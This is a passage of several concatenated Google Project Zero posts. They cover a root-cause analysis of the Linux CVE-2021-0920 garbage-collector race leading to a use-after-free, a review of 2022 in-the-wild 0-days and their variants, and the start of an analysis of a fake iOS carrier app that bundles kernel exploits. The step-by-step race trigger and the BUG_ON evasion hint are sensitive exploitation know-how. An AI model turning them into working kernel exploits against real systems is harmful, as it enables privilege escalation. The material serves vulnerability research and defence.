list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

To do this, the kernel moves the candidate to the not_cycle_list instead, iterates through its receive queue, and increments the inflight count back for each transmitted file in the gc_candidates list (garbage.c#L281). The entire process is done recursively, so that the garbage collection avoids purging reachable sockets:

/* Restore the references for children of all candidates,

 * which have remaining references.  Do this recursively, so

 * only those remain, which form cyclic references.

 *

 * Use a "cursor" link, to make the list traversal safe, even

 * though elements might be moved about.

 */

list_add(&cursor, &gc_candidates);

while (cursor.next != &gc_candidates) {

        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */

        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {

                list_move_tail(&u->link, &not_cycle_list);

                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

                scan_children(&u->sk, inc_inflight_move_tail, NULL);

        }

}

list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original

 * inflight counters for these as well, and remove the skbuffs

 * which are creating the cycle(s).

 */

skb_queue_head_init(&hitlist);

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a

 * cycle.  Restore these to the inflight list.

 */

while (!list_empty(&not_cycle_list)) {

        u = list_entry(not_cycle_list.next, struct unix_sock, link);

        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

        list_move_tail(&u->link, &gc_inflight_list);

}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */

__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**

 *      __skb_queue_purge - empty a list

 *      @list: list to empty

 *

 *      Delete all buffers on an &sk_buff list. Each buffer is removed from

 *      the list and one reference dropped. This function does not take the

 *      list lock and the caller must hold the relevant locks to use it.

 */

void skb_queue_purge(struct sk_buff_head *list);

static inline void __skb_queue_purge(struct sk_buff_head *list)

{

        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)

                kfree_skb(skb);

}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in progress, the kernel will not perform another unix_gc invocation.

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f 00 sends socket f 00 to socket f 01.
  2. Socket f 01 sends socket f 01 to socket 𝛼.
  3. Close f 00.
  4. Close f 01.

Before starting the garbage collection process, the status of socket file descriptors are:

  • f 00: ref = 1, inflight = 1
  • f 01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

f00, f01 and alpha form a breakable cycle.

Breakable cycle by f 00, f 01 and 𝛼

During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. It calls unix_detach_fds to decrement the inflight count, and unix_detach_fds then clears the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)

{

        int i;

        scm->fp = UNIXCB(skb).fp;

        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)

                unix_notinflight(scm->fp->user, scm->fp->fp[i]);

}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))

                        list_del_init(&u->link);

                unix_tot_inflight--;

        }

        user->unix_inflight--;

        spin_unlock(&unix_gc_lock);

}

Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)

{

        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));

        scm.pid  = UNIXCB(skb).pid;

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */

        /* So fscking what? fput() had been SMP-safe since the last Summer */

        scm_destroy(&scm);

        sock_wfree(skb);

}

In fact, unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp was already cleared by the earlier unix_detach_fds call. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked to install the new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):

/* It is questionable, see note in unix_dgram_recvmsg.

 */

if (UNIXCB(skb).fp)

        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)

        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f 00, f 01
  • f 10, f 11

Now, the program does the following operations:

  • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
  • f 10 → [f 00] → f 11
  • Close(f 00)

f00, f01, f10, f11 forms a breakable cycle.

Breakable cycle by f 00, f 01, f 10 and f 11

Here is the status:

  • inflight(f 00) = 2, ref(f 00) = 2
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.

If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:

After f01 receives the socket file descriptor by MSG_PEEK, the reference count of f00 is incremented and the receive queue from f01 remains the same.

MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared

Status:

  • inflight(f 00) = 2, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

Then, f 01 calls recvmsg without the MSG_PEEK flag and f 01’s receive queue is cleared. f 01 also fetches a new file descriptor f 00'':

After f01 receives the socket file descriptor without MSG_PEEK, the receive queue is cleared and file descriptor f00'' is obtained.

The receive queue of f 01 is cleared and f 00'' is obtained from f 01

Status:

  • inflight(f 00) = 1, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

UAF Scenario

From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼:

  • f 00, f 01
  • f 10, f 11
  • f 20, f 21
  • f 30, f 31
  • sock 𝛼 (in reality there might be thousands of 𝛼 sockets, used to protract the garbage collection process in order to evade a BUG_ON check which will be introduced later).

Now, the program does the below operations:

Close the following file descriptors prior to any recvmsg calls:

  • Close(f 00)
  • Close(f 01)
  • Close(f 11)
  • Close(f 10)
  • Close(f 30)
  • Close(f 31)
  • Close(𝛼)

Here is the status:

  • inflight(f 00) = N + 1, ref(f 00) = N + 1
  • inflight(f 01) = 2, ref(f 01) = 2
  • inflight(f 10) = 3, ref(f 10) = 3
  • inflight(f 11) = 1, ref(f 11) = 1
  • inflight(f 20) = 0, ref(f 20) = 1
  • inflight(f 21) = 0, ref(f 21) = 1
  • inflight(f 31) = 1, ref(f 31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel will perform the following analysis:

  • List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
  • Since f 21 is not considered a candidate, f 11’s inflight count is still above zero.
  • Recursively restore the inflight count.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.
  2. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.
  3. Concurrently do the following operations:
       • Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.
       • Call recvmsg with MSG_PEEK flag from f 10.

How is this possible? Let’s first see a case where the race condition is not hit, so there is no UAF:

Thread 0: Call unix_gc.

Thread 0: Stage0: List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates.

Thread 1: Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.

Thread 1: Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Thread 0: Stage0: Decrease the inflight count for the child of every garbage candidate.

Thread 0: Status after stage 0: inflight(f 00) = 0, inflight(f 01) = 0, inflight(f 10) = 0, inflight(f 11) = 1, inflight(f 31) = 0, inflight(𝛼) = 0.

Thread 0: Stage1: Recursively restore the inflight count of any candidate that still has a positive inflight count.

Thread 0: Stage1: All inflight counts have been restored.

Thread 0: Stage2: No garbage, return.

Thread 1: Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.

Thread 1: Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.

Thread 2: Call recvmsg with MSG_PEEK flag from f 10.

Threads 0, 1 and 2: everyone is happy.

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

Thread 0: Call unix_gc.

Thread 0: Stage0: List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates.

Thread 1: Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.

Thread 1: Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Thread 0: Stage0: Decrease the inflight count for the child of every garbage candidate.

Thread 0: Status after stage 0: inflight(f 00) = 0, inflight(f 01) = 0, inflight(f 10) = 0, inflight(f 11) = 1, inflight(f 31) = 0, inflight(𝛼) = 0.

Thread 0: Stage1: Start restoring the inflight counts.

Thread 1: Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.

Thread 1: Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.

Thread 1: unix_detach_fds: UNIXCB(skb).fp = NULL.

Thread 1: Blocked by spin_lock(&unix_gc_lock).

Thread 0: Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.

Thread 0: Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage.

Thread 0: Stage2: Start purging garbage.

Thread 2: Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00'.

Thread 2: Get skb = skb_peek(&sk->sk_receive_queue); this skb is about to be freed by thread 0.

Thread 0: Stage2: Calls __skb_unlink and kfree_skb on that skb.

Thread 2: state->recv_actor(skb, skip, chunk, state): UAF.

Thread 0: GC finished.

Thread 1: Start garbage collection.

Thread 1: Get f 10’’.

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not started or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f 11’ and the inflight sockets don't form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

 

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided the correct patch advice but it was not accepted by the Linux kernel community:

Linux kernel developers: Why would I apply a patch that's an RFC, doesn't have a proper commit message, lacks a proper signoff, and also lacks ACK's and feedback from other knowledgable developers?

Patch was not applied in 2016

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);

+       spin_unlock(&unix_gc_lock);

The patch is confusing at first glance: it's rare to see a lock acquired and then immediately released like this. Regardless, the MSG_PEEK path now waits for the completion of the garbage collector, so the UAF issue is resolved.

BUG_ON Added in 2017

Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

        if (s) {

                struct unix_sock *u = unix_sk(s);

 

+               BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

 

                if (atomic_long_dec_and_test(&u->inflight))

At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, it can evade the BUG_ON check via heap spray.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.


Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel garbage collector. We have also analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.

The bug was spotted publicly in 2016, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actor who saw the public email thread would have had a chance to develop an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.

2022 0-day In-the-Wild Exploitation…so far

30 June 2022 at 13:00

Posted by Maddie Stone, Google Project Zero

This blog post is an overview of a talk, “0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.

For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.        

As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.  

Product                                 2022 ITW 0-day                   Variant

-------                                 --------------                   -------

Windows win32k                          CVE-2022-21882                   CVE-2021-1732 (2021 itw)

iOS IOMobileFrameBuffer                 CVE-2022-22587                   CVE-2021-30983 (2021 itw)

Windows                                 CVE-2022-30190 (“Follina”)       CVE-2021-40444 (2021 itw)

Chromium property access interceptors   CVE-2022-1096                    CVE-2016-5128, CVE-2021-30551 (2021 itw), CVE-2022-1232 (addresses incomplete CVE-2022-1096 fix)

Chromium v8                             CVE-2022-1364                    CVE-2021-21195

WebKit                                  CVE-2022-22620 (“Zombie”)        Bug was originally fixed in 2013, patch was regressed in 2016

Google Pixel                            CVE-2021-39793*                  Linux: same bug in a different subsystem

Atlassian Confluence                    CVE-2022-26134                   CVE-2021-26084

Windows                                 CVE-2022-26925 (“PetitPotam”)    CVE-2021-36942 (patch regressed)

* While this CVE says 2021, the bug was patched and disclosed in 2022.

So, what does this mean?

When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.

Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took was patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

 

Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:

  • Root cause analysis

Understanding the underlying vulnerability that is being exploited, as well as how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.

  • Variant analysis

Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.

  • Patch analysis

Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.

  • Exploit technique analysis

Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.

Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.  

The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue, CVE-2021-30983, was fixed in iOS 15.2 in December 2021.


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text My Vodafone.

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodafone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the WhatsApp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linus Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi linux project which is porting linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests, with a bit of Python and the partialzip tool we can relatively easily and quickly fetch every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ARMv8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.
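
For illustration, the macro presumably looks something like this (a sketch; the macro name is invented, though the flag value and argument order come from the decompiled call sites):


#define DCP_LOG(fmt, ...) \
  log(0x40000001LL, __FILE__, __LINE__, fmt, \
      __PRETTY_FUNCTION__, ##__VA_ARGS__)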

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"

ADD  X9, X9, #aRtkitIos18264@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)
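
For illustration, such an identifier is just a 32-bit integer built from four ASCII bytes, which compilers (and IDA) render as multi-character literals. A hypothetical type check might look like this (is_BLHA is an invented helper):


// 'BLHA' == 0x424C4841: the bytes 'B' 'L' 'H' 'A' packed into a uint32_t
bool is_BLHA(uint32_t typeid_field) { return typeid_field == 'BLHA'; }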


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor version of IOMobileFrameBuffer, and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

